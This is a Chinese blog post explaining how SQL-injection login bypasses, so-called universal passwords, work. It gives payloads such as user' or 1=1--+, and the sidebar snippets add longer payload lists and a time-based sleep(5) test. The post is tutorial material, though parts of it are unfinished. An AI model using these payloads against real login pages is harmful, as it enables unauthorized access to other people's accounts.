【web安全】万能密码总结

最新推荐文章于 2024-06-02 11:15:53 发布
最新推荐文章于 2024-06-02 11:15:53 发布
阅读量487 收藏 3
点赞数 1
分类专栏: 渗透测试 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79590880/article/details/135007414
版权

前言

菜某的总结,欢迎提意见补充~

万能密码的原理

万能密码实际上也算是sql注入的一种。

登录界面是一个与数据库交互的位置,很容易产生sql注入的位置。

我们登录时输入的数据会带入数据库查询进行比对,当用户名与用户的密码对的上的话,返回true,那就允许我们登录。

那么万能密码的思路就是,通过类似于sql注入的手法,想办法在不输入正确的账号密码下让他返回一个true。

这个就是登录验证的SQL语句

select * from user where username='user' and password='pass';

我们就是要让这个语句在user跟pass对不上号的时候也能返回个true

账号已知密码未知(不知道他密码登录他账号)

还是看这个语句

select * from user where username='user' and password='pass'

可以看到我们只知道正确的username,不知道password,但是还要这个语句返回个ture。

我们这样做

用户名写入:

user' or 1=1--+

user' or True--+

user' or 1--+

 这样语句就变成了

select * from user where username='user' or 1=1--+' and password='pass'

返回为True,就进去了。

账号未知密码已知(光知道个密码,不知道是谁的账号)

还是围绕这个式子

select * from user where username='user' and password='pass'

我们只能操作后面的内容

其实一个路子

加个or的语句完事。

总结

北岭敲键盘的荒漠猫
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
phpweb的文件破解并修复万能密码漏洞
06-23
phpweb的post.php文件破解并修复万能密码漏洞 。绝逼可用
web安全总结文档.doc
11-29
web安全总结文档.doc
Web_sql万能密码(DAY6)
CHUNJIUJUN的博客
08-04 210
先附上我收集的一些万能密码 'or 1=1/* "or "a"="a "or 1=1-- "or"=" "or"="a'='a "or1=1-- "or=or" ''or'='or' ') or ('a'='a '.).or.('.a.'='.a 'or 1=1 'or 1=1-- 'or 1=1/* 'or"="a'='a 'or' '1'='1' 'or''=' 'or''=''or''=' 'or'='1' 'or'='or' 'or.'a.'='a 'or1=1-- 1'or'1'='1...
Web安全--万能密码大全+图片马合成方法
余十步的博客
04-25 520
万能密码大全:asp、aspx、php、jsp万能密码大全。
后台登陆万能密码
热门推荐
请叫我菜鸟
01-14 1万+
asp aspx万能密码   1: "or "a"="a    2: ')or('a'='a    3:or 1=1--    4:'or 1=1--    5:a'or' 1=1--    6: "or 1=1--    7:'or'a'='a    8: "or"="a'='a    9:'or''='    10:'or'='or'    11: 1 or '1'=
web后台常用的万能密码
hahaha233330的博客
10-26 8515
网站后台万能密码就是在用户名与密码处都写入下列字符,如果知道管理员帐号的话直接添帐号,效果会更好。 例如我们要利用第一条就是: 用户名:"or “a”="a 密码:"or “a”="a 1:"or “a”="a 2: ‘.).or.(’.a.’=’.a 3:or 1=1– 4:‘or 1=1– 5:a’or’ 1=1– 6:"or 1=1– 7:‘or.‘a.’=‘a 8:“or”="a’=‘a 9:‘or’’=’ 10:‘or’=‘or’ 原理都是利用SQL语法来利用注入,其实这也是注入的一种,都是
Web】SQL注入--万能密码
HAPPY
08-08 9731
后台万能密码¶ admin' -- admin' # admin'/* ' or 1=1-- ' or 1=1# ' or 1=1/* ') or '1'='1-- ') or ('1'='1-- username=' or ''='&password=' or ''=' 解析:select * from admin where username=''=''...
web4.0之万能密码登录
good good study
04-26 5686
一. 页面观察 看到一个登陆框,看到登录框我们就要想到是否存在sql注入,逻辑漏洞(前端认证绕过)。我们先看下是否存在sql注入 2. 注入判断 随便输入数据,我们用burp截取数据包 我们输入单引号或者双引号都不会报错,页面也不会有任何变化,所以尝试延时注入 输入admin' sleep(5)# ,成功延时十秒。确定存在注入 3. 尝试万能密码登录绕过 admin' or 1=1# 我们可以猜测,我们的输入传到后台是这样的 用户名为假,or 1=1为真,后面的语句被注.
实验吧-WEB-sql万能密码注入
qq_43661408的博客
06-24 618
登陆一下好吗?? 题目链接: http://ctf5.shiyanbar.com/web/wonderkun/web/index.html 解题思路: 登陆一下好吗?表明可能登陆成功后就能得到flag,但是题目已经说过滤了的一切,所以一些关键字 例如 or ,应该被过滤了。 通常的后台代码应该是: select username,password from user where username=...
WEB安全知识总结.zip
12-27
WEB知识的快速入门知识,方便查阅知识点,常见WEB漏洞
web安全课程总结.png
08-03
网络安全攻防,学习方法,学习思路,学习场景
Flash安全的一些总结WEB安全电脑资料.doc
12-21
Flash安全的一些总结WEB安全电脑资料.doc
比较简单实用的WEB安全设置总结
01-10
服务器方面 1、首先是要NTFS格式,并减少user之类用户的权限,FAT32格式的磁盘没有权限设置,也就没有安全可言; 2、其次是补丁要全,否则服务器... 6、密码安全、桌面锁定软件、命令函数更名等其他小的设置,就和安全
webug4.0万能密码登陆-11
weixin_34124651的博客
03-17 276
/*这道题很水不过也值得总结下*/ 打开界面 1. 我尝试输入 admin admin 竟然出flag了。。。这应该不是作者本意 2. 好了 言归正传 我猜测后台逻辑应该是这样的: select * from table where username= 'user' and password = 'pass' 3.1 利用逻辑绕过 构造payload ad...
渗透测试之Web安全系列教程(一)
最新发布
fearhacker的专栏
06-02 754
script 标签 的 src 属性,指向跨域脚本的URL地址!如果客户端,是我们自己编制的浏览器,或者是自己编制的可以解析网页内容的脚本,那么,我们是可以突破同源策略限制的!由于 浏览器的同源策略,并没有对 script 等标签进行同源限制,这导致了 恶意黑客 可以利用这一特性,并通过一些 Web 网站中所存在的XSS注入漏洞,将一些恶意的代码(包含 script 相关内容,而 script 的 src 属性的值,可能是指向某个其它域的、包含木马脚本的URL地址)内容嵌入到 Web 网站的指定页面中。
<网络安全VIP>第一篇《工业互联网安全
Else 的博客
05-28 980
工业互联网的网络是基础,平台是核心,安全是保障。信息化会提高工业化的生产效率,但信息化本身具备两面性。一方面它可以让信息交互更加顺畅,共享更加快捷;但另一方面是带来相应的安全威胁。
HFish蜜罐实践:网络安全防御的主动出击
weixin_43822401的博客
05-29 637
HFish蜜罐作为一种主动防御工具,通过模拟易受攻击的服务,吸引攻击者,不仅能有效捕获攻击行为,还能为安全分析和溯源提供宝贵信息。HFish蜜罐作为一种先进的网络安全防御工具,不仅能够有效地捕获和分析攻击行为,还能为安全专家提供攻击溯源的重要线索。为每个节点配置蜜罐服务,如FTP、SSH、Telnet等,这些服务作为诱饵,用于吸引并捕获攻击者的行为。收集所有连接和攻击节点的IP信息,通过分析这些信息,刻画攻击者画像,构建私有情报库。利用攻击者使用的工具漏洞,进行信息提取和溯源,确定攻击者的身份和来源。
网络安全等级保护,三级等保技术建议书(word原件获取)
2302_79423711的博客
06-02 260
本文末个人名片直接获取所有资料。
web安全如何攻入获取账户密码
01-27
Web安全攻击通常包括网络钓鱼、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等多种方式。 首先,网络钓鱼是通过伪装成合法网站或邮件来骗取用户的个人信息和密码。攻击者会发送伪装成银行、社交媒体或电子邮件服务商的虚假网页或邮件给用户,让用户输入账户密码等信息,从而获取用户的个人信息。 其次,跨站脚本攻击(XSS)是通过在网站上注入恶意脚本来获取用户的账户密码。攻击者可以将恶意脚本注入到网页中,当用户访问受感染的网页时,恶意脚本会获取用户输入的账户密码等信息并发送至攻击者。 最后,跨站请求伪造(CSRF)是攻击者通过伪造用户发出的请求,来获取用户的账户密码。攻击者可以在用户登录了某个网站后,发送伪造的请求来执行一些操作,例如修改密码或进行交易,从而获取用户的账户密码信息。 为了保护个人账户密码的安全,用户应该注意识别和避免网络钓鱼网站和邮件、保持浏览器和操作系统的及时更新以减少XSS和CSRF的风险,同时也要避免在不可信的网站上输入账户密码。网站开发者也应该及时更新网站安全漏洞,采用安全编程规范以避免遭受各种Web安全攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

北岭敲键盘的荒漠猫

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值